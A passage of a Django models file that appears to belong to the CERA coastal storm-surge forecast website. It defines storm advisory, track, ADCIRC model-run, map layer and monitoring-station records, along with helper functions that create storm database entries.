CATEGORY_CHOICES, null=True, blank=True)\n adv_time_utc = models.DateTimeField('NHC advisory time', help_text='Provide the advisory time in CDT date format YYYY-MM-DD and CDT time format HH:MM:SS.', null=True, blank=True)\n\n dependent_enable_public_dev = models.BooleanField(default=False)\n dependent_enable_public_pro = models.BooleanField(default=False)\n dependent_enable_public_pub = models.BooleanField(default=False)\n dependent_enable_public_ng = models.BooleanField(default=False)\n dependent_enable_public_nc = models.BooleanField(default=False)\n dependent_enable_public_pr = models.BooleanField(default=False)\n dependent_enable_public_ri = models.BooleanField(default=False)\n dependent_enable_public_st = models.BooleanField(default=False)\n dependent_enable_adminmode_dev = models.BooleanField(default=True)\n dependent_enable_adminmode_pro = models.BooleanField(default=True)\n dependent_enable_adminmode_pub = models.BooleanField(default=True)\n dependent_enable_adminmode_ng = models.BooleanField(default=True)\n dependent_enable_adminmode_nc = models.BooleanField(default=True)\n dependent_enable_adminmode_pr = models.BooleanField(default=True)\n dependent_enable_adminmode_ri = models.BooleanField(default=True)\n dependent_enable_adminmode_st = models.BooleanField(default=True)\n dependent_asgs_dev = models.BooleanField(default=False)\n dependent_asgs_pro = models.BooleanField(default=False)\n dependent_asgs_pub = models.BooleanField(default=False)\n dependent_asgs_nc = models.BooleanField(default=False)\n dependent_asgs_ng = models.BooleanField(default=False)\n dependent_asgs_pr = models.BooleanField(default=False)\n dependent_asgs_ri = models.BooleanField(default=False)\n dependent_asgs_st = models.BooleanField(default=False)\n dependent_region_nc_ng = models.BooleanField(default=False)\n dependent_region_nc = models.BooleanField(default=False)\n dependent_region_ng = models.BooleanField(default=False)\n dependent_region_ri = models.BooleanField(default=False)\n dependent_region_pr = models.BooleanField(default=False)\n\n def __unicode__(self):\n return str(self.advisory)\n\n class Meta:\n # plural name for class\n verbose_name_plural = \"Advisories and Tracks\"\n ordering = ['-adv_time_utc']\n\n###############################################################################\nTRACK_CHOICES = (\n (\"t01\", \"NHC forecast\"),\n (\"t02\", \"max wind speed\"),\n (\"t03\", \"over land speed\"),\n (\"t04\", \"veer left\"),\n (\"t05\", \"veer right\"),\n (\"t06\", \"max radius\"),\n (\"t07\", \"max wind speed only\"),\n (\"t08\", \"constant max radius\"),\n (\"t14\", \"shift left\"), \n (\"t15\", \"shift right\"), \n # FEMA runs\n (\"t88\", \"synthetic\")\n)\n\nclass track(models.Model):\n id = models.AutoField('ID', primary_key=True, unique=True)\n\n track = models.CharField(max_length=3, choices = TRACK_CHOICES)\n mod_percent = models.CharField('percent/miles track modification', max_length=5, null=True, blank=True, default=0)\n advisory = models.ForeignKey(advisory, on_delete=models.CASCADE)\n # at least one model run uses this track (for clickable subtracks)\n has_model_run = models.BooleanField(default=False)\n\n dependent_enable_public_dev = models.BooleanField(default=False)\n dependent_enable_public_pro = models.BooleanField(default=False)\n dependent_enable_public_pub = models.BooleanField(default=False)\n dependent_enable_public_ng = models.BooleanField(default=False)\n dependent_enable_public_nc = models.BooleanField(default=False)\n dependent_enable_public_pr = models.BooleanField(default=False)\n dependent_enable_public_ri = models.BooleanField(default=False)\n dependent_enable_public_st = models.BooleanField(default=False)\n dependent_enable_adminmode_dev = models.BooleanField(default=True)\n dependent_enable_adminmode_pro = models.BooleanField(default=True)\n dependent_enable_adminmode_pub = models.BooleanField(default=True)\n dependent_enable_adminmode_ng = models.BooleanField(default=True)\n dependent_enable_adminmode_nc = models.BooleanField(default=True)\n dependent_enable_adminmode_pr = models.BooleanField(default=True)\n dependent_enable_adminmode_ri = models.BooleanField(default=True)\n dependent_enable_adminmode_st = models.BooleanField(default=True)\n dependent_asgs_dev = models.BooleanField(default=False)\n dependent_asgs_pro = models.BooleanField(default=False)\n dependent_asgs_pub = models.BooleanField(default=False)\n dependent_asgs_nc = models.BooleanField(default=False)\n dependent_asgs_ng = models.BooleanField(default=False)\n dependent_asgs_pr = models.BooleanField(default=False)\n dependent_asgs_ri = models.BooleanField(default=False)\n dependent_asgs_st = models.BooleanField(default=False)\n dependent_region_nc_ng = models.BooleanField(default=False)\n dependent_region_nc = models.BooleanField(default=False)\n dependent_region_ng = models.BooleanField(default=False)\n dependent_region_ri = models.BooleanField(default=False)\n dependent_region_pr = models.BooleanField(default=False)\n\n def __unicode__(self):\n return \"ID: %s (%s)\" % (self.id, self.track)\n\n def get_track_info_text(self):\n if self.advisory.advisory == '999':\n return 'NHC best track'\n # 991: hindcast OWI (Irma 2017 with different start time)\n if self.advisory.advisory == '991':\n return 'best track'\n if self.track == 't01' or self.track == 't88':\n return self.get_track_display()\n if self.track != 't08':\n return \"%s %s%% \" % (self.get_track_display(), self.mod_percent)\n return \"%s %snm\" % (self.get_track_display(), self.mod_percent)\n\n class Meta:\n ordering = ['id']\n\n\n###############################################################################\nGRID_CHOICES = (\n (\"cpra_2011_v03a\",\"CPRAv3\"),\n (\"cpra_2017_v07a_chk\",\"CPRA2017v07\"),\n (\"cpra2017_v11k-CurrentConditions_chk\",\"CPRA2017v11\"),\n (\"cpra2017_v12c-CurrentConditions-WithUpperAtch_chk\",\"CPRA2017v12\"),\n (\"ec95d\",\"EC95D\"),\n (\"FEMA_R2_merge_VALID_correct_gcs_mNAVD\",\"FEMAR2\"),\n# (\"FEMA_R2_norivers_gcs_mNAVD\",\"FEMAR2_2016\"),\n (\"FEMAR3\",\"FEMAR3\"),\n (\"FEMAR4\", \"FEMAR4\"),\n (\"sl15_2010_HSDRRS_2012_v9\",\"HSDRRS\"),\n (\"HSDRRS2014_MRGO_leveeupdate_fixSTC_MX\",\"HSDRRS2014\"),\n (\"hsofs\", \"HSOFS\"),\n (\"ULLR2D\", \"IOOSul\"),\n (\"LA_v12h-WithUpperAtch\", \"LAv12hAtch\"),\n (\"LA_v17a-WithUpperAtch_chk\", \"LAv17a\"),\n (\"LPRBv1\", \"LPRBv1\"),\n (\"NACCS_2014_r01\", \"NAC2014\"),\n (\"narragansett\", \"NARRA\"),\n (\"narragansett_bay_ec_95d_v2\", \"NARRA2015v2\"),\n (\"nc6b\",\"NC6B\"),\n (\"nc_inundation_v9.99\",\"NCv999\"),\n (\"nc_inundation_v9.99_w_rivers\",\"NCv999riv\"),\n (\"ocpr_v19a_DesAllemands4CERA\",\"OCPRv19\"),\n# (\"norl_s08_g05f_grd\",\"S08\"),\n (\"prv01\", \"PRv01\"),\n (\"sl15v3_2007_r9a\",\"SL15v3\"),\n (\"sl15_2007_IHNC_r03q_levchk\",\"SL15v7\"),\n (\"sl16_alpha_2007_26\",\"SL16\"),\n (\"tx2008r35h\", \"TX2008\"),\n (\"tx2008r35hred\", \"TX2008red\"),\n (\"wFL_v4.1.0\",\"wFlv41\"),\n (\"ECIRL\",\"ECIRL\")\n)\n\nWINDMODEL_CHOICES = (\n (\"fitz-nws4\",\"FITZ Wind Scheme\"),\n (\"GFDL_URI\", \"GFDL URI\"),\n # NOAA Hurricane Research Division\n (\"hwind\", \"NOAA HWind\"),\n # with background winds\n (\"lsu\",\"LSU Wind Model\"),\n (\"NWS-305\",\"NWS-305\"),\n (\"vortex-nws308\", \"NWS-308\"),\n # Oceanweather Inc. Fast Delivery Meteorology\n (\"NWS-12\",\"OWI NWS-12\"),\n (\"NWS-312\",\"OWI NWS-312\"),\n # simplified Holland B derived from from the initial tropical cyclone\n # conditions provided by NHC and JTWC (sometimes referred to as TC vitals\n # or the TC bogus), used by RI group\n (\"tc-vitals\", \"TC Vitals\"),\n (\"tides_only\", \"Tides only\"),\n # Assymetric Holland Model\n (\"vortex-nws19\",\"AHM\"),\n #version 2014 - Generalized Asymmetric Holland Model)\n (\"vortex-nws20\",\"GAHM\"),\n # Asymmetric Vortex + Waves\n (\"vortex-nws319\",\"AHM+SWAN\"),\n (\"vortex-nws320\",\"GAHM+SWAN\"),\n (\"weatherflow-nws312\", \"Weatherflow\"),\n (\"WNAMAW12-NCP\",\"12km NAM\"),\n (\"WNAMAW12+NWS19\",\"12km NAM + AHM\"),\n (\"WNAMAW32-NCP\",\"32km NAM\")\n)\n\nWMSSERVER_CHOICES = (\n (\"NC1\",\"nc-cera.renci.org\"),\n (\"NC2\",\"nccera-2.renci.org\"),\n (\"LA1\",\"cera.cct.lsu.edu\"),\n (\"LA2\",\"twister.cct.lsu.edu\"),\n (\"LA3\",\"jupiter.cct.lsu.edu\"),\n (\"LA4\",\"juno.cct.lsu.edu\"),\n (\"LA5\",\"luna.cct.lsu.edu\"),\n (\"LA6\",\"apollo.cct.lsu.edu\")\n)\n\ndef get_data_host_display(short_name):\n for choice in WMSSERVER_CHOICES:\n if choice[0] == short_name:\n return choice[1]\n return 'unknown'\n\nADCIRCDATAHOST_CHOICES = (\n (\"blueridge.renci.org\",\"blueridge.renci.org\"),\n (\"coconut.dmes.fit.edu\",\"coconut.dmes.fit.edu\"),\n (\"croatan.renci.org\", \"croatan.renci.org\"),\n (\"diamond.erdc.hpc.mil\", \"diamond.erdc.hpc.mil\"),\n (\"garnet.erdc.hpc.mil\",\"garnet.erdc.hpc.mil\"),\n (\"hatteras.renci.org\", \"hatteras.renci.org\"),\n (\"lonestar.tacc.utexas.edu\", \"lonestar.tacc.utexas.edu\"),\n (\"mike.hpc.lsu.edu\", \"mike.hpc.lsu.edu\"),\n (\"MSUserver\",\"MSU server\"),\n (\"queenbee.loni.org\",\"queenbee.loni.org\"),\n (\"tezpur.hpc.lsu.edu\",\"tezpur.hpc.lsu.edu\"),\n (\"topaz.erdc.hpc.mil\", \"topaz.erdc.hpc.mil\"),\n (\"thunder.afrl.hpc.mil\", \"thunder.afrl.hpc.mil\")\n)\n\nMAP_REGION = (\n (\"nc_ng\",\"nc_ng\"),\n (\"ng\",\"ng\"),\n (\"nc\",\"nc\"),\n (\"pr\",\"pr\"),\n (\"ri\",\"ri\")\n)\n\nLEGEND_CHOICES = (\n (\"ng\",\"Gulf\"),\n (\"nc\",\"Atlantic\"),\n (\"pr\",\"Puerto\")\n)\n\nclass adcrun_info(models.Model):\n\n #primary model run ID\n id = models.AutoField('ID', primary_key=True, unique=True)\n\n # the following fields should be many-to-many relations -> one adcrun_info can have many asgs systems and many layerinfos\n # asgs_systems = models.ManyToManyField(asgs_system)\n # layerinfos = models.ManyToManyField(layerinfo, null=True, blank=True)\n # the approach using ForeignKeys in the associated models (asgs_system and layerinfo) blows up the DB\n # but is much simpler in admin.py/views.py\n\n adcrun_daytime_utc = models.DateTimeField('ASGS start day and time') # asgs model start time\n # default: 3hrs after runstarttime to match advisory times\n adcrun_daytime_cera = models.DateTimeField('CERA start day and time', help_text='Normally 3 hrs after RunStartTime to match advisory time (except hindcasts).')\n adcrun_enddaytime_utc = models.DateTimeField('ASGS end day and time', null=True, blank=True)\n\n ### has at least one associated storm advisory or advisory 999\n has_adv = models.BooleanField('active storm (has_adv)', default=False)\n track_id = models.ForeignKey(track, verbose_name='ID track', help_text='Select the ID from the associated track', on_delete=models.CASCADE, null=True, blank=True)\n ### pseudo storm (real storm under different conditions or test/synthetic storms)\n is_pseudo = models.BooleanField('pseudo', default=False)\n\n windmodel = models.CharField('wind model', max_length=25, null=True, blank=True, choices=WINDMODEL_CHOICES)\n grid = models.CharField('Grid', max_length=50, choices=GRID_CHOICES)\n grid_datum = models.CharField('grid datum', max_length=4)\n # 'Model Info' select box: default is windmodel/grid (function 'get_model_info_text'\n # for multiple runs on DEV site, the asgs_instance will be added\n asgs_instance = models.CharField('ASGS instance', max_length=25, null=True, blank=True)\n # adcrun identifier for equal runs except description or adcirc_datahost (developer/professional/stations page)\n sequence_nr = models.IntegerField('Sequence Nr.', null=True, blank=True)\n # info button\n description = models.CharField(null=True, blank=True, max_length=500)\n surfheight = models.CharField('Sea Surface Height', null=True, blank=True, max_length=10)\n h0 = models.CharField('H0', null=True, blank=True, max_length=6)\n msboundflux = models.CharField('MS Boundary Flux', null=True, blank=True, max_length=10)\n msboundid = models.CharField('MS Boundary GageID', null=True, blank=True, max_length=25)\n atboundflux = models.CharField('AT Boundary Flux', null=True, blank=True, max_length=10)\n atboundid = models.CharField('AT Boundary GageID', null=True, blank=True, max_length=25)\n ncpu= models.CharField('Number CPU', null=True, blank=True, max_length=5)\n remark = models.CharField(null=True, blank=True, max_length=300)\n\n enable_public = models.BooleanField('Enable public web server', default=False)\n enable_adminmode = models.BooleanField('Enable admin display', default=True)\n program_version = models.IntegerField('Program version', default=8)\n ### original data host (ADCRIC/SWAN data)\n adcirc_datahost = models.CharField('ADCIRC data host', max_length=30, null=True, blank=True, choices=ADCIRCDATAHOST_CHOICES)\n ### data_host (tif, wfs data)\n wmsserver = models.CharField('CERA data host', max_length=4, null=True, blank=True, choices=WMSSERVER_CHOICES)\n ### tilecache\n nr_cacheserver = models.IntegerField('CERA cache hosts', default=0)\n\n asgs_dev = models.BooleanField('ASGS-DEV', default=False)\n asgs_pro = models.BooleanField('ASGS-PRO', default=False)\n asgs_pub = models.BooleanField('ASGS-PUB', default=False)\n asgs_nc = models.BooleanField('ASGS-NC', default=False)\n asgs_ng = models.BooleanField('ASGS-NG', default=False)\n asgs_pr = models.BooleanField('ASGS-PR', default=False)\n asgs_ri = models.BooleanField('ASGS-RI', default=False)\n asgs_st = models.BooleanField('ASGS-ST', default=False)\n\n # show this run as default when multiple runs are available with the same starttime\n default_view = models.BooleanField('Default view', default=False)\n\n # ocean basin that triggers the nc/ng/nc_ng map settings on the website\n website_region = models.CharField('Website region', max_length=5, null=True, blank=True, choices=MAP_REGION)\n #show correct legend images\n legend = models.CharField(max_length=7, choices=LEGEND_CHOICES)\n\n def set_nr_cacheserver(self):\n if self.wmsserver == \"LA1\" or self.wmsserver == \"NC1\" or self.wmsserver == \"NC2\" or self.wmsserver == \"LA3\" or self.wmsserver == \"LA4\" or self.wmsserver == \"LA5\" or self.wmsserver == \"LA6\":\n self.nr_cacheserver = 4\n else:\n self.nr_cacheserver = 0\n\n def init_grid_datum(self):\n if self.grid in (\"nc6b\", \"nc_inundation_v9.99\", \"nc_inundation_v9.99_w_rivers\", \"FEMA_R2_merge_VALID_correct_gcs_mNAVD\", \"FEMAR3\", \"ec95d\", \"prv01\", \"NAC2014_r01\", \"narragansett\", \"narragansett_bay_ec_95d_v2\", \"hsofs\", \"LPRBv1\"):\n self.grid_datum = 'msl'\n else:\n self.grid_datum = 'navd'\n\n def grid_datum_text(self):\n if self.grid_datum == 'msl':\n return 'MSL'\n return 'NAVD88'\n\n def __unicode__(self):\n return \"ID: %s\" % self.id\n\n class Meta:\n verbose_name = \"ADCIRC Run Info\"\n verbose_name_plural = \"ADCIRC Run Info\"\n ordering = ['adcrun_daytime_utc']\n\n# -----------------------------------------------------------------------------\n # model info select box for DEV site (windmodel/grid)\n\n def get_model_info_text_pro(self):\n windmodel = 'Unknown'\n if self.windmodel is not None:\n windmodel = self.get_windmodel_display()\n seq = ''\n if self.sequence_nr is not None:\n seq = ' (%s)' % self.sequence_nr\n return '%s / %s%s' % (windmodel, self.get_mapped_grid_display(), seq)\n\n def get_model_info_text_dev(self):\n windmodel = 'Unknown'\n if self.windmodel is not None:\n windmodel = self.get_windmodel_display()\n# if self.asgs_instance is not None and self.asgs_instance != '':\n# return '%s / %s (%s)' % (windmodel, self.get_mapped_grid_display(), self.asgs_instance)\n return '%s / %s' % (windmodel, self.get_mapped_grid_display())\n\n# 'best for' select box on public pages (ng,nc,pr)\n# if for selected time either only storm or only NAM run exist\n def grid_region_text(self):\n region = 'Unknown'\n if self.grid == \"sl16_alpha_2007_26\":\n region = \"Northern Gulf\"\n elif self.grid == \"ec95d\":\n region = \"all regions - low resolution\"\n elif self.grid == \"ocpr_v19a_DesAllemands4CERA\" or self.grid == \"cpra_2011_v03a\" or self.grid == \"cpra_2017_v07a_chk\" \\\n or self.grid == \"cpra2017_v11k-CurrentConditions_chk\" or self.grid == \"cpra2017_v12c-CurrentConditions-WithUpperAtch_chk\" \\\n or self.grid == \"sl15v3_2007_r9a\" or self.grid == \"sl15_2007_IHNC_r03q_levchk\" \\\n or self.grid == \"LA_v12h-WithUpperAtch\" or self.grid == \"LA_v17a-WithUpperAtch_chk\":\n region = \"Louisiana\"\n elif self.grid == \"sl15_2010_HSDRRS_2012_v9\" or self.grid == \"HSDRRS2014_MRGO_leveeupdate_fixSTC_MX\":\n region = \"East Louisiana\"\n elif self.grid == \"nc6b\" or self.grid == \"nc_inundation_v9.99\" or self.grid == \"nc_inundation_v9.99_w_rivers\":\n region = \"North Carolina\"\n elif self.grid == \"FEMA_R2_merge_VALID_correct_gcs_mNAVD\":\n region = \"New Jersey\"\n elif self.grid == \"FEMAR3\":\n region = \"Virginia/Maryland\"\n elif self.grid == \"FEMAR4\":\n region = \"Mississippi/Alabama\"\n elif self.grid == \"ULLR2D\":\n region = \"Gulf of Mexico\"\n elif self.grid == \"prv01\":\n region = \"Puerto Rico\"\n elif self.grid == \"tx2008r35h\" or self.grid == \"tx2008r35hred\":\n region = \"Texas\"\n elif self.grid == \"NACCS_2014_r01\":\n region = \"North Atlantic\"\n elif self.grid == \"narragansett\" or self.grid == \"narragansett_bay_ec_95d_v2\":\n region = \"Rhode Island\"\n elif self.grid == \"hsofs\":\n region = \"Atlantic/Gulf\"\n elif self.grid == \"wFL_v4.1.0\":\n region = \"West Florida\"\n elif self.grid == \"ECIRL\":\n region = \"East Florida\"\n elif self.grid == \"LPRBv1\":\n region = \"Lower Pearl River\"\n\n return '%s' % region\n\n# 'best for' select box\n # if for selected time multiple runs exist\n def grid_region1_text(self):\n region = self.grid_region_text()\n seq = ''\n if self.sequence_nr is not None:\n seq = ' (%s)' % self.sequence_nr\n return '%s%s' % (region, seq)\n\n # if for selected time both storm + NAM run exist\n def grid_region2_text(self):\n region = self.grid_region_text()\n seq = ''\n if self.sequence_nr is not None:\n seq = ' (%s)' % self.sequence_nr\n\n if self.has_adv:\n return '%s%s' % (region, seq)\n else:\n return '%s (NAM)%s' % (region, seq)\n\n# show in select box a different name than the get_grid_display name\n def get_mapped_grid_display(self):\n mapped_name = self.get_grid_display()\n if self.grid == 'cpra_2011_v03a':\n mapped_name = 'CPRA2011'\n elif self.grid == 'ocpr_v19a_DesAllemands4CERA':\n mapped_name = 'OCPR'\n elif self.grid == 'cpra_2017':\n mapped_name = 'CPRA2017v07'\n elif self.grid == 'sl15_2010_HSDRRS_2012_v9':\n mapped_name = 'HSDRRS2012'\n# elif self.grid == 'nc_inundation_v9.99':\n# mapped_name = 'NCv999'\n elif self.grid == 'tx2008r35hred':\n mapped_name = 'TX2008reduced'\n elif self.grid == 'FEMA_R2_merge_VALID_correct_gcs_mNAVD':\n mapped_name = 'FEMAR2'\n elif self.grid == 'hsofs':\n mapped_name = 'HSOFS'\n\n return mapped_name\n\n# -----------------------------------------------------------------------------\n def get_sequence_nr(self):\n if self.sequence_nr is None:\n return ''\n else:\n if self.asgs_instance is None:\n return ' (%s)' % self.sequence_nr\n return ' (%s)' % self.asgs_instance\n# return ' (%s)' % self.sequence_nr\n\n# -----------------------------------------------------------------------------\n # windmodel for legend (difference maps - hindcast comparisons)\n def get_windmodel_diffmaps(self):\n if self.windmodel is not None:\n return '%s' % self.get_windmodel_display()\n\n# -----------------------------------------------------------------------------\n# adcrun_time in 'Time' select box (used in views.py)\n def get_adcrun_time(self):\n return self.adcrun_daytime_utc #.strftime('%H:%M %Z')\n\n# -----------------------------------------------------------------------------\n# calculate length of best track in days for hindcast track display in menu\n def get_hindcast_days(self):\n return (self.runend - self.runstart).days\n\n# set data_host for pre-defined cache tiles\n def get_data_host_cache_display(self):\n data_host = self.wmsserver\n if data_host == 'NC1':\n return get_data_host_display('NC2')\n if data_host == 'NC2':\n return get_data_host_display('NC1')\n if data_host == 'LA5':\n return get_data_host_display('LA4')\n return get_data_host_display('LA5')\n# return get_data_host_display('LA4')\n\n\n###############################################################################\nclass subtrack(models.Model):\n id = models.AutoField('ID', primary_key=True, unique=True)\n adcrunid = models.ForeignKey(adcrun_info, on_delete=models.CASCADE)\n trackid = models.ForeignKey(track, on_delete=models.CASCADE)\n\n def __unicode__(self):\n return \"ID: %s\" % (self.adcrunid.id)\n\n#####################################################################################\nLAYER_CHOICES = (\n ### timesteps layers SHP\n (\"elevshp\", \"elevshp\"),\n (\"inunshp\", \"inunshp\"),\n (\"hsignshp\", \"hsignshp\"),\n (\"tpsshp\", \"tpsshp\"),\n (\"wvelshp\", \"wvelshp\"),\n (\"wvel10shp\", \"wvel10shp\"),\n ### max layers SHP\n (\"maxelevshp\", \"maxelevshp\"),\n (\"maxinunshp\", \"maxinunshp\"),\n (\"maxhsignshp\", \"maxhsignshp\"),\n (\"maxtpsshp\", \"maxtpsshp\"),\n (\"maxwvelshp\", \"maxwvelshp\"),\n (\"maxwvel10shp\", \"maxwvel10shp\"),\n ### stations\n (\"hydro\", \"hydro\"),\n (\"hydroval\", \"hydroval\"),\n (\"prec\", \"prec\"),\n (\"precimg\", \"precimg\"),\n ### storm info\n (\"track_invest\", \"track_invest\"),\n (\"track_sub\", \"track_sub\"),\n ### timesteps layers TIF\n (\"elev\", \"elev\"),\n (\"inun\", \"inun\"),\n (\"hsign\", \"hsign\"),\n (\"tps\", \"tps\"),\n (\"wvel\", \"wvel\"),\n (\"wvelf\", \"wvelf\"),\n ### max layers TIF\n (\"maxelev\", \"maxelev\"),\n (\"maxinun\", \"maxinun\"),\n (\"maxhsign\", \"maxhsign\"),\n (\"maxtps\", \"maxtps\"),\n (\"maxwvel\", \"maxwvel\"),\n ### max layers (autoscale) TIF\n (\"maxelev_auto\", \"maxelev_auto\"),\n (\"maxinun_auto\", \"maxinun_auto\"),\n (\"maxhsign_auto\", \"maxhsign_auto\"),\n (\"maxtps_auto\", \"maxtps_auto\"),\n (\"maxwvel_auto\", \"maxwvel_auto\"),\n ### difference layers (hindcast comparisions)\n (\"diffmaxwvelhist\", \"diffmaxwvelhist\")\n)\n\nclass layerinfo(models.Model):\n\n id = models.AutoField(primary_key=True, unique=True)\n layername = models.CharField('layer exists', max_length=20, choices = LAYER_CHOICES)\n# layer_output_start = models.DateTimeField('layer output start time', null=True, blank=True)\n# layer_output_end = models.DateTimeField('layer output end time', null=True, blank=True)\n show_layer = models.BooleanField(verbose_name='display layer', default=True)\n\n # this should be a many-to-many relation -> one layerinfo can have many adcrun_infos\n # adcrun_infos = models.ManyToManyField(adcrun_info)\n # the used approach blows up the DB but is much simpler in admin.py/views.py\n adcrun_info = models.ForeignKey(adcrun_info, on_delete=models.CASCADE)\n\n def __unicode__(self):\n return \"%s\" % self.adcrun_info\n\n class Meta:\n #name for class\n verbose_name_plural = \"Layer Info\"\n\n################################################################################\n# stations to display hydrographs\nclass hydro(models.Model):\n id = models.AutoField(primary_key=True, unique=True)\n stationid = models.CharField(max_length=18, null=True, blank=True)\n stationname = models.CharField(max_length=60, null=True, blank=True)\n state = models.CharField(max_length=2)\n agency = models.CharField(max_length=8)\n # human-readable for charts\n agencyname = models.CharField(max_length=8)\n realtimeurl = models.CharField(max_length=150, null=True, blank=True)\n alt_stationid = models.CharField(max_length=18, null=True, blank=True)\n alt_agencyname = models.CharField(max_length=8)\n alt_realtimeurl = models.CharField(max_length=150, null=True, blank=True)\n\n def __unicode__(self):\n return self.stationname\n\n################################################################################\n# stations to display precipitation\nclass prec(models.Model):\n id = models.AutoField(primary_key=True, unique=True)\n stationid = models.CharField(max_length=18, null=True, blank=True)\n stationname = models.CharField(max_length=60, null=True, blank=True)\n state = models.CharField(max_length=2)\n agency = models.CharField(max_length=9)\n agencyname = models.CharField(max_length=4)\n realtimeurl = models.CharField(max_length=150, null=True, blank=True)\n\n def __unicode__(self):\n return self.stationname\n\n################################################################################\n# assign CERA servers to HPC machines\n# decides whether the complete CERA worklow (for nc_ng/pro) or the limited workflow (pub) will be executed on the given CERA server -> cera.process.py\nclass filter_ceraserver(models.Model):\n\n id = models.AutoField('ID', primary_key=True, unique=True)\n cera_datahost = models.CharField('CERA data host', max_length=4, null=True, blank=True, choices=WMSSERVER_CHOICES)\n adcirc_datahost = models.CharField('ADCIRC data host', max_length=30, null=True, blank=True, choices=ADCIRCDATAHOST_CHOICES)\n # combination CERA/ADCIRCHOST is allowed for ASGS runs\n active = models.BooleanField('active', default=False)\n # runs the pub or pro CERA workflow\n pro_model_run = models.BooleanField('PRO model run', help_text='Set to start the CERA workflow for the PRO website. If not set, the reduced workflow for the PUB website will be executed.', default=False)\n\n def __unicode__(self):\n return \"%s\" % self.id\n\n class Meta:\n verbose_name = \"Filter CERA Servers\"\n verbose_name_plural = \"Filter CERA Servers\"\n ordering = ['cera_datahost']\n\n################################################################################\n# filter ASGS runs (meshes and tracks) and assign default mesh\nclass filter_asgs(models.Model):\n\n #primary model run ID\n id = models.AutoField('ID', primary_key=True, unique=True)\n grid = models.CharField('ADCIRC grid', max_length=50, choices=GRID_CHOICES)\n\n # show this grid as default when multiple runs are available with the same starttime\n # will be used to set default grid for each run in adcrun_info with filldb_info.py\n default_view_ng = models.BooleanField('Default NG', default=False)\n default_view_nc = models.BooleanField('Default NC', default=False)\n default_view_pro = models.BooleanField('Default PRO', default=False)\n\n daily = models.BooleanField(default=True)\n stormt01 = models.BooleanField('NHC Consensus', default=True)\n stormt02 = models.BooleanField('max wind speed', default=True)\n stormt03 = models.BooleanField('over land speed', default=True)\n stormt04 = models.BooleanField('veer left', default=True)\n stormt05 = models.BooleanField('veer right', default=True)\n stormt06 = models.BooleanField('max radius', default=True)\n stormt07 = models.BooleanField('max wind speed only', default=True)\n stormt08 = models.BooleanField('constant max radius', default=True)\n stormt14 = models.BooleanField('shift left', default=True)\n stormt15 = models.BooleanField('shift right', default=True)\n # hypothetical runs\n stormt88 = models.BooleanField('synthetic', default=True)\n\n def __unicode__(self):\n return \"%s\" % self.id\n\n class Meta:\n verbose_name = \"Filter ASGS Runs\"\n verbose_name_plural = \"Filter ASGS Runs\"\n ordering = ['grid']\n\n###############################################################################\ndef find_or_create_year(year):\n\n # try to find the year in 'storm_year'\n year_info = storm_year.objects.filter(year=year)\n\n if (len(year_info) == 0):\n # 'year' does not exist in db, create a new one\n thisyear = storm_year()\n thisyear.year = year\n thisyear.save(force_insert=True)\n\n else:\n # use existing record from 'storm_year' (entire data record)\n thisyear = year_info[0]\n\n return thisyear\n\ndef find_or_create_storminfo(this_year, stormnr, stormname, firstadv_dt, adv):\n\n storm_name = None\n if stormname is not None and len(stormname) > 0:\n storm_name = stormname\n\n has_hindcast = False\n if adv == '999':\n has_hindcast = True\n\n # try to find the storm via 'thisyear.id' and 'stormnr' in 'storm'\n storm_info = storm.objects \\\n .filter(year=this_year.id) \\\n .filter(storm_number=stormnr)\n\n if (len(storm_info) == 0):\n # 'storm' does not exist in db, create a new one\n thisstorm = storm()\n thisstorm.year = this_year\n thisstorm.storm_number = stormnr\n if storm_name is not None:\n thisstorm.stormname = storm_name\n else:\n thisstorm.stormname = \"Storm: %s\" % stormnr\n if firstadv_dt is not None:\n thisstorm.start_date_utc = firstadv_dt\n if has_hindcast:\n thisstorm.has_hindcast = True\n thisstorm.save(force_insert=True)\n\n else:\n # use existing record from db (entire data record)\n thisstorm = storm_info[0]\n\n # optional parameters may need to be upddated with each new run\n need_update = False\n if stormname is not None and thisstorm.stormname != stormname:\n thisstorm.stormname = stormname\n need_update = True\n# if len(firstadv) > 0 and thisstorm.start_date_utc != firstadv_dt:\n # firstadv in storm.bal is often too early and manually corrected in the DB, do not overwrite\n if firstadv_dt is not None and thisstorm.start_date_utc == None:\n thisstorm.start_date_utc = firstadv_dt\n need_update = True\n if has_hindcast and not thisstorm.has_hindcast:\n thisstorm.has_hindcast = True\n need_update = True\n if need_update:\n thisstorm.save(force_update=True)\n\n return thisstorm\n\ndef find_or_create_advinfo(this_storminfo, adv, stormclass, category, advtime_dt):\n\n # try to find the advisory via 'thisstorm.id' and 'adv' in 'advisory'\n adv_info = advisory.objects \\\n .filter(storm=this_storminfo.id) \\\n .filter(advisory=adv)\n\n if (len(adv_info) == 0):\n # 'advisory' does not exist in db, create a new one\n thisadv = advisory()\n thisadv.storm = this_storminfo\n thisadv.advisory = adv\n if stormclass is not None:\n thisadv.stormclass = stormclass\n if category is not None:\n thisadv.category = category\n if advtime_dt is not None:\n thisadv.adv_time_utc = advtime_dt\n thisadv.save(force_insert=True)\n\n else:\n # use existing record from db (entire data record)\n thisadv = adv_info[0]\n\n # optional parameters can be upddated with each new run\n need_update = False\n if stormclass is not None and thisadv.stormclass != stormclass:\n thisadv.stormclass = stormclass\n need_update = True\n if category is not None and thisadv.category != category:\n thisadv.category = category\n need_update = True\n if need_update:\n thisadv.save(force_update=True)\n\n return thisadv\n\ndef find_or_create_trackinfo(this_advinfo, tracknr, percent):\n\n if len(percent) == 0:\n percent = '0'\n\n # try to find the track via 'thisadv.id' and 'tracknr' in 'track'\n track_info = track.objects \\\n .filter(advisory=this_advinfo.id) \\\n .filter(track=tracknr) \\\n .filter(mod_percent=percent)\n\n if (len(track_info) == 0):\n # 'track' does not exist in db, create a new one\n thistrack = track()\n thistrack.advisory = this_advinfo\n thistrack.track = tracknr\n thistrack.mod_percent = percent\n thistrack.save(force_insert=True)\n\n else:\n # use existing record from 'track'\n thistrack = track_info[0]\n\n return thistrack\n\ndef create_storm_records(year, stormnr, stormname, firstadv_dt, adv, stormclass, category, advtime_dt, tracknr, percent):\n # the only unique storm model is the storm_year model\n # (given the available URL parameters)\n # thats why the test needs to start from the storm_year downwards\n\n this_year = find_or_create_year(year)\n this_storminfo = find_or_create_storminfo(this_year, stormnr, stormname, firstadv_dt, adv)\n this_advinfo = find_or_create_advinfo(this_storminfo, adv, stormclass, category, advtime_dt)\n this_track = find_or_create_trackinfo(this_advinfo, tracknr, percent)\n\n return this_track\n\n##############################################################################\n# signal handler will be called on new record/update of a record in\n# model 'storm' (post_save) and changes the 